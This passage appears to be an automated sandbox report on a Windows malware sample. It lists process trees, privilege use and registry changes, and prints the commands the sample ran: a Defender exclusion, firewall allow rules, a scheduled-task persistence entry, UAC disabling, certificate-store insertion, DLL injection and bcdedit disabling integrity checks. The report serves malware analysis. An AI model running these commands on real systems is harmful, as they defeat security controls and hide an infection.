Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	BEppgGl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	patch.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exepowershell.exeXFyfSPWtThhhYf9nK71Dwc6z.exeZHWH2GFKQja0muj4RLymlJe3.exeXFyfSPWtThhhYf9nK71Dwc6z.exeQg_Appv5.exepowershell.exeZHWH2GFKQja0muj4RLymlJe3.exeUniversalInstaller.exeUniversalInstaller.exeinjector.exeSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.execmd.exepowershell.EXEpowershell.exeBEppgGl.exepowershell.exe

pid	process
824	0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe
2164	powershell.exe
2592	XFyfSPWtThhhYf9nK71Dwc6z.exe
1900	ZHWH2GFKQja0muj4RLymlJe3.exe
1972	XFyfSPWtThhhYf9nK71Dwc6z.exe
1972	XFyfSPWtThhhYf9nK71Dwc6z.exe
1972	XFyfSPWtThhhYf9nK71Dwc6z.exe
1972	XFyfSPWtThhhYf9nK71Dwc6z.exe
1972	XFyfSPWtThhhYf9nK71Dwc6z.exe
1908	Qg_Appv5.exe
2664	powershell.exe
2428	ZHWH2GFKQja0muj4RLymlJe3.exe
2428	ZHWH2GFKQja0muj4RLymlJe3.exe
2428	ZHWH2GFKQja0muj4RLymlJe3.exe
2428	ZHWH2GFKQja0muj4RLymlJe3.exe
2428	ZHWH2GFKQja0muj4RLymlJe3.exe
1908	Qg_Appv5.exe
1908	Qg_Appv5.exe
2412	UniversalInstaller.exe
604	UniversalInstaller.exe
2724	injector.exe
604	UniversalInstaller.exe
2724	injector.exe
1852	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
1852	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
1852	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
2724	injector.exe
2724	injector.exe
1852	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
1852	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
2724	injector.exe
2724	injector.exe
2724	injector.exe
2724	injector.exe
2724	injector.exe
2724	injector.exe
2040	cmd.exe
2040	cmd.exe
2724	injector.exe
1092	powershell.EXE
2724	injector.exe
2724	injector.exe
2724	injector.exe
2724	injector.exe
2724	injector.exe
1092	powershell.EXE
1092	powershell.EXE
2724	injector.exe
2724	injector.exe
2148	powershell.exe
2724	injector.exe
2724	injector.exe
2724	injector.exe
2724	injector.exe
2724	injector.exe
2724	injector.exe
1756	BEppgGl.exe
1756	BEppgGl.exe
1756	BEppgGl.exe
1756	BEppgGl.exe
1756	BEppgGl.exe
2280	powershell.exe
2724	injector.exe
1756	BEppgGl.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

480
480
Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

UniversalInstaller.execmd.exe

pid process

604 UniversalInstaller.exe
2040 cmd.exe
2040 cmd.exe

pid	process
480
480

pid	process
604	UniversalInstaller.exe
2040	cmd.exe
2040	cmd.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exepowershell.exeregsvcs.exeXFyfSPWtThhhYf9nK71Dwc6z.exeZHWH2GFKQja0muj4RLymlJe3.exepowershell.exeWMIC.execsrss.exeSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exepowershell.EXEpowershell.exeWMIC.exepowershell.exeWMIC.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	824	0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe
Token: SeDebugPrivilege	2164	powershell.exe
Token: SeDebugPrivilege	2008	regsvcs.exe
Token: SeDebugPrivilege	2592	XFyfSPWtThhhYf9nK71Dwc6z.exe
Token: SeImpersonatePrivilege	2592	XFyfSPWtThhhYf9nK71Dwc6z.exe
Token: SeDebugPrivilege	1900	ZHWH2GFKQja0muj4RLymlJe3.exe
Token: SeImpersonatePrivilege	1900	ZHWH2GFKQja0muj4RLymlJe3.exe
Token: SeDebugPrivilege	2664	powershell.exe
Token: SeIncreaseQuotaPrivilege	1492	WMIC.exe
Token: SeSecurityPrivilege	1492	WMIC.exe
Token: SeTakeOwnershipPrivilege	1492	WMIC.exe
Token: SeLoadDriverPrivilege	1492	WMIC.exe
Token: SeSystemProfilePrivilege	1492	WMIC.exe
Token: SeSystemtimePrivilege	1492	WMIC.exe
Token: SeProfSingleProcessPrivilege	1492	WMIC.exe
Token: SeIncBasePriorityPrivilege	1492	WMIC.exe
Token: SeCreatePagefilePrivilege	1492	WMIC.exe
Token: SeBackupPrivilege	1492	WMIC.exe
Token: SeRestorePrivilege	1492	WMIC.exe
Token: SeShutdownPrivilege	1492	WMIC.exe
Token: SeDebugPrivilege	1492	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1492	WMIC.exe
Token: SeRemoteShutdownPrivilege	1492	WMIC.exe
Token: SeUndockPrivilege	1492	WMIC.exe
Token: SeManageVolumePrivilege	1492	WMIC.exe
Token: 33	1492	WMIC.exe
Token: 34	1492	WMIC.exe
Token: 35	1492	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1548	csrss.exe
Token: SeDebugPrivilege	1852	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
Token: SeDebugPrivilege	1092	powershell.EXE
Token: SeDebugPrivilege	2148	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	2004	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2004	WMIC.exe
Token: SeSecurityPrivilege	2004	WMIC.exe
Token: SeTakeOwnershipPrivilege	2004	WMIC.exe
Token: SeLoadDriverPrivilege	2004	WMIC.exe
Token: SeSystemtimePrivilege	2004	WMIC.exe
Token: SeBackupPrivilege	2004	WMIC.exe
Token: SeRestorePrivilege	2004	WMIC.exe
Token: SeShutdownPrivilege	2004	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2004	WMIC.exe
Token: SeUndockPrivilege	2004	WMIC.exe
Token: SeManageVolumePrivilege	2004	WMIC.exe
Token: SeDebugPrivilege	2280	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	1472	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1472	WMIC.exe
Token: SeSecurityPrivilege	1472	WMIC.exe
Token: SeTakeOwnershipPrivilege	1472	WMIC.exe
Token: SeLoadDriverPrivilege	1472	WMIC.exe
Token: SeSystemtimePrivilege	1472	WMIC.exe
Token: SeBackupPrivilege	1472	WMIC.exe
Token: SeRestorePrivilege	1472	WMIC.exe
Token: SeShutdownPrivilege	1472	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1472	WMIC.exe
Token: SeUndockPrivilege	1472	WMIC.exe
Token: SeManageVolumePrivilege	1472	WMIC.exe
Token: SeDebugPrivilege	1352	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	2188	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2188	WMIC.exe
Token: SeSecurityPrivilege	2188	WMIC.exe
Token: SeTakeOwnershipPrivilege	2188	WMIC.exe
Token: SeLoadDriverPrivilege	2188	WMIC.exe
Token: SeSystemtimePrivilege	2188	WMIC.exe

Suspicious use of FindShellTrayWindow 7 IoCs

Processes:

u180.1.exe

pid process

2752 u180.1.exe
2752 u180.1.exe
2752 u180.1.exe
2752 u180.1.exe
2752 u180.1.exe
2752 u180.1.exe
2752 u180.1.exe
Suspicious use of SendNotifyMessage 7 IoCs

Processes:

u180.1.exe

pid process

2752 u180.1.exe
2752 u180.1.exe
2752 u180.1.exe
2752 u180.1.exe
2752 u180.1.exe
2752 u180.1.exe
2752 u180.1.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

Qg_Appv5.exeUniversalInstaller.exeUniversalInstaller.exeMSBuild.exe

pid process

1908 Qg_Appv5.exe
2412 UniversalInstaller.exe
2412 UniversalInstaller.exe
604 UniversalInstaller.exe
604 UniversalInstaller.exe
2492 MSBuild.exe

pid	process
2752	u180.1.exe
2752	u180.1.exe
2752	u180.1.exe
2752	u180.1.exe
2752	u180.1.exe
2752	u180.1.exe
2752	u180.1.exe

pid	process
2752	u180.1.exe
2752	u180.1.exe
2752	u180.1.exe
2752	u180.1.exe
2752	u180.1.exe
2752	u180.1.exe
2752	u180.1.exe

pid	process
1908	Qg_Appv5.exe
2412	UniversalInstaller.exe
2412	UniversalInstaller.exe
604	UniversalInstaller.exe
604	UniversalInstaller.exe
2492	MSBuild.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exeregsvcs.exe7wQhpSx1j6VjjJwiHraNyS7W.exeVlEvAYeyGWtNYpmsg8pkMJtj.exeXFyfSPWtThhhYf9nK71Dwc6z.exeInstall.exe

description	pid	process	target process
PID 824 wrote to memory of 2164	824	0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe	powershell.exe
PID 824 wrote to memory of 2164	824	0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe	powershell.exe
PID 824 wrote to memory of 2164	824	0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe	powershell.exe
PID 824 wrote to memory of 2008	824	0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe	regsvcs.exe
PID 824 wrote to memory of 2008	824	0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe	regsvcs.exe
PID 824 wrote to memory of 2008	824	0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe	regsvcs.exe
PID 824 wrote to memory of 2008	824	0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe	regsvcs.exe
PID 824 wrote to memory of 2008	824	0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe	regsvcs.exe
PID 824 wrote to memory of 2008	824	0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe	regsvcs.exe
PID 824 wrote to memory of 2008	824	0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe	regsvcs.exe
PID 824 wrote to memory of 2008	824	0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe	regsvcs.exe
PID 824 wrote to memory of 2008	824	0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe	regsvcs.exe
PID 824 wrote to memory of 2008	824	0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe	regsvcs.exe
PID 824 wrote to memory of 2008	824	0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe	regsvcs.exe
PID 824 wrote to memory of 2008	824	0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe	regsvcs.exe
PID 824 wrote to memory of 2660	824	0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe	WerFault.exe
PID 824 wrote to memory of 2660	824	0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe	WerFault.exe
PID 824 wrote to memory of 2660	824	0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe	WerFault.exe
PID 2008 wrote to memory of 1584	2008	regsvcs.exe	7wQhpSx1j6VjjJwiHraNyS7W.exe
PID 2008 wrote to memory of 1584	2008	regsvcs.exe	7wQhpSx1j6VjjJwiHraNyS7W.exe
PID 2008 wrote to memory of 1584	2008	regsvcs.exe	7wQhpSx1j6VjjJwiHraNyS7W.exe
PID 2008 wrote to memory of 1584	2008	regsvcs.exe	7wQhpSx1j6VjjJwiHraNyS7W.exe
PID 2008 wrote to memory of 1900	2008	regsvcs.exe	ZHWH2GFKQja0muj4RLymlJe3.exe
PID 2008 wrote to memory of 1900	2008	regsvcs.exe	ZHWH2GFKQja0muj4RLymlJe3.exe
PID 2008 wrote to memory of 1900	2008	regsvcs.exe	ZHWH2GFKQja0muj4RLymlJe3.exe
PID 2008 wrote to memory of 1900	2008	regsvcs.exe	ZHWH2GFKQja0muj4RLymlJe3.exe
PID 2008 wrote to memory of 2592	2008	regsvcs.exe	XFyfSPWtThhhYf9nK71Dwc6z.exe
PID 2008 wrote to memory of 2592	2008	regsvcs.exe	XFyfSPWtThhhYf9nK71Dwc6z.exe
PID 2008 wrote to memory of 2592	2008	regsvcs.exe	XFyfSPWtThhhYf9nK71Dwc6z.exe
PID 2008 wrote to memory of 2592	2008	regsvcs.exe	XFyfSPWtThhhYf9nK71Dwc6z.exe
PID 1584 wrote to memory of 320	1584	7wQhpSx1j6VjjJwiHraNyS7W.exe	u180.0.exe
PID 1584 wrote to memory of 320	1584	7wQhpSx1j6VjjJwiHraNyS7W.exe	u180.0.exe
PID 1584 wrote to memory of 320	1584	7wQhpSx1j6VjjJwiHraNyS7W.exe	u180.0.exe
PID 1584 wrote to memory of 320	1584	7wQhpSx1j6VjjJwiHraNyS7W.exe	u180.0.exe
PID 2008 wrote to memory of 2972	2008	regsvcs.exe	Ae6KcqZDG3RHyqUIPyDn6abJ.exe
PID 2008 wrote to memory of 2972	2008	regsvcs.exe	Ae6KcqZDG3RHyqUIPyDn6abJ.exe
PID 2008 wrote to memory of 2972	2008	regsvcs.exe	Ae6KcqZDG3RHyqUIPyDn6abJ.exe
PID 2008 wrote to memory of 2972	2008	regsvcs.exe	Ae6KcqZDG3RHyqUIPyDn6abJ.exe
PID 2008 wrote to memory of 2424	2008	regsvcs.exe	VlEvAYeyGWtNYpmsg8pkMJtj.exe
PID 2008 wrote to memory of 2424	2008	regsvcs.exe	VlEvAYeyGWtNYpmsg8pkMJtj.exe
PID 2008 wrote to memory of 2424	2008	regsvcs.exe	VlEvAYeyGWtNYpmsg8pkMJtj.exe
PID 2008 wrote to memory of 2424	2008	regsvcs.exe	VlEvAYeyGWtNYpmsg8pkMJtj.exe
PID 2008 wrote to memory of 2424	2008	regsvcs.exe	VlEvAYeyGWtNYpmsg8pkMJtj.exe
PID 2008 wrote to memory of 2424	2008	regsvcs.exe	VlEvAYeyGWtNYpmsg8pkMJtj.exe
PID 2008 wrote to memory of 2424	2008	regsvcs.exe	VlEvAYeyGWtNYpmsg8pkMJtj.exe
PID 2424 wrote to memory of 1204	2424	VlEvAYeyGWtNYpmsg8pkMJtj.exe	Install.exe
PID 2424 wrote to memory of 1204	2424	VlEvAYeyGWtNYpmsg8pkMJtj.exe	Install.exe
PID 2424 wrote to memory of 1204	2424	VlEvAYeyGWtNYpmsg8pkMJtj.exe	Install.exe
PID 2424 wrote to memory of 1204	2424	VlEvAYeyGWtNYpmsg8pkMJtj.exe	Install.exe
PID 2424 wrote to memory of 1204	2424	VlEvAYeyGWtNYpmsg8pkMJtj.exe	Install.exe
PID 2424 wrote to memory of 1204	2424	VlEvAYeyGWtNYpmsg8pkMJtj.exe	Install.exe
PID 2424 wrote to memory of 1204	2424	VlEvAYeyGWtNYpmsg8pkMJtj.exe	Install.exe
PID 1584 wrote to memory of 1908	1584	7wQhpSx1j6VjjJwiHraNyS7W.exe	Qg_Appv5.exe
PID 1584 wrote to memory of 1908	1584	7wQhpSx1j6VjjJwiHraNyS7W.exe	Qg_Appv5.exe
PID 1584 wrote to memory of 1908	1584	7wQhpSx1j6VjjJwiHraNyS7W.exe	Qg_Appv5.exe
PID 1584 wrote to memory of 1908	1584	7wQhpSx1j6VjjJwiHraNyS7W.exe	Qg_Appv5.exe
PID 1972 wrote to memory of 1852	1972	XFyfSPWtThhhYf9nK71Dwc6z.exe	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 1972 wrote to memory of 1852	1972	XFyfSPWtThhhYf9nK71Dwc6z.exe	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 1972 wrote to memory of 1852	1972	XFyfSPWtThhhYf9nK71Dwc6z.exe	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 1972 wrote to memory of 1852	1972	XFyfSPWtThhhYf9nK71Dwc6z.exe	SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
PID 1204 wrote to memory of 2348	1204	Install.exe	forfiles.exe
PID 1204 wrote to memory of 2348	1204	Install.exe	forfiles.exe
PID 1204 wrote to memory of 2348	1204	Install.exe	forfiles.exe
PID 1204 wrote to memory of 2348	1204	Install.exe	forfiles.exe

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

Processes:

0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe
"C:\Users\Admin\AppData\Local\Temp\0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe"
1⤵
- UAC bypass
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:824

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe" -Force
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2164

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
2⤵
- Drops startup file
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2008

C:\Users\Admin\Pictures\7wQhpSx1j6VjjJwiHraNyS7W.exe
"C:\Users\Admin\Pictures\7wQhpSx1j6VjjJwiHraNyS7W.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1584

C:\Users\Admin\AppData\Local\Temp\u180.0.exe
"C:\Users\Admin\AppData\Local\Temp\u180.0.exe"
4⤵
- Executes dropped EXE
PID:320

C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe
"C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1908

C:\Users\Admin\AppData\Local\Temp\Zqicom_beta\UniversalInstaller.exe
C:\Users\Admin\AppData\Local\Temp\Zqicom_beta\UniversalInstaller.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2412

C:\Users\Admin\AppData\Roaming\Zqicom_beta\UniversalInstaller.exe
C:\Users\Admin\AppData\Roaming\Zqicom_beta\UniversalInstaller.exe
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:604

C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
7⤵
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2040

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
8⤵
- Suspicious use of SetWindowsHookEx
PID:2492

C:\Users\Admin\AppData\Local\Temp\u180.1.exe
"C:\Users\Admin\AppData\Local\Temp\u180.1.exe"
4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2752

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
5⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1852

C:\Users\Admin\Pictures\ZHWH2GFKQja0muj4RLymlJe3.exe
"C:\Users\Admin\Pictures\ZHWH2GFKQja0muj4RLymlJe3.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1900

C:\Users\Admin\Pictures\ZHWH2GFKQja0muj4RLymlJe3.exe
"C:\Users\Admin\Pictures\ZHWH2GFKQja0muj4RLymlJe3.exe"
4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:2428

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
5⤵
PID:564

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
6⤵
- Modifies Windows Firewall
PID:768

C:\Users\Admin\Pictures\XFyfSPWtThhhYf9nK71Dwc6z.exe
"C:\Users\Admin\Pictures\XFyfSPWtThhhYf9nK71Dwc6z.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2592

C:\Users\Admin\Pictures\XFyfSPWtThhhYf9nK71Dwc6z.exe
"C:\Users\Admin\Pictures\XFyfSPWtThhhYf9nK71Dwc6z.exe"
4⤵
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1972

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
5⤵
PID:1852

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
6⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:1608

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Manipulates WinMon driver.
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1548

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
6⤵
- Creates scheduled task(s)
PID:2808

C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
6⤵
PID:2440

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2724

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:588

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
7⤵
- Modifies boot configuration data using bcdedit
PID:2764

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
7⤵
- Modifies boot configuration data using bcdedit
PID:1760

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
7⤵
- Modifies boot configuration data using bcdedit
PID:2712

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
7⤵
- Modifies boot configuration data using bcdedit
PID:1696

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
7⤵
- Modifies boot configuration data using bcdedit
PID:1952

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
7⤵
- Modifies boot configuration data using bcdedit
PID:2208

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
7⤵
- Modifies boot configuration data using bcdedit
PID:2604

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
7⤵
- Modifies boot configuration data using bcdedit
PID:1876

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
7⤵
- Modifies boot configuration data using bcdedit
PID:392

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
7⤵
- Modifies boot configuration data using bcdedit
PID:1540

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
7⤵
- Modifies boot configuration data using bcdedit
PID:2028

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
7⤵
- Modifies boot configuration data using bcdedit
PID:2372

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
7⤵
- Modifies boot configuration data using bcdedit
PID:2160

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
6⤵
